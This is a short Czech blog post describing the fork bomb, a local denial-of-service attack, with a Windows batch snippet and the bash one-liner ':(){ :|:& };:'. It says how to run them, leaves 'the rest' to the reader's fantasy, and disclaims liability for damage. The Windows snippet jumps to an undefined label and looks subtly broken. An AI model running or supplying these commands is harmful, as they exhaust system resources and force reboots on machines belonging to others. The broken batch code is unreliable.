Forkbomb

12. 05. 2014 | Jakub Kadlčík | CZ exploit

Forkbomb je lokální DoS útok proti operačnímu systému. Je založený na nekonečné rekurzi forkovací funkce, která má za následek požírání systémových zdrojů, které lze vyřešit až následným rebootem systému.

Upozornění: Autor tohoto zápisku není zodpovedný za škody vzniklé spouštěním následujících skriptů.

##Implementace

###Windows

start
%0
goto :s

###GNU/Linux

:(){ :|:& };:

Použití

Ve windows vytvoříme bat soubor, v linuxu lze spustit příkaz přímo z konzole, nebo vytvořit spustitelný soubor. Zbytek záleží na vaši fantasii.

Odkazy

  1. http://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
  2. http://en.wikipedia.org/wiki/Fork_bomb